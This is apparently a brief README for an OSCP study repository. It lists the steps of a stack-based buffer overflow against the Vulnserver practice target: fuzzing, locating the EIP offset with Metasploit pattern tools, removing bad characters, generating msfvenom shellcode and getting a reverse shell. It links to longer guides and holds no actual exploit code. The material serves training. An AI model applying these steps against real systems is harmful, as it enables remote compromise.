this repository gives you details commands about Stack based buffer overflow
-
open the file fuzz.py and send buffer as per your conviniance
-
create a pattern to get the address of EIP -- use pattern_create from metasploit
get the value and then run pattern_offset from metasploit -- get the exect offset
run the create pattern script
-
add extra 4 bytes and control the eip
-
create badchars -- https://bulbsecurity.com/finding-bad-characters-with-immunity-debugger-and-mona-py/
find out bad chars !! remove them
5 now create shelcode with - msfvenom --with your removed bad chars
- get a reverse shell
visit this https://github.com/c3rtcub3/stack_based_buffer_overflow_vulnserver/tree/master/bof and check procedure in more details and also get trun file to check vulnserver
to get a detailed all-in-one bufferoverflow guide visit -- https://blog.certcube.com/oscp-detail-guide-to-stack-buffer-overflow-1/
follow all 9 blogs you will get a decent knowledge about bof which will help you crack the OSCP Bof
Regards, Naresh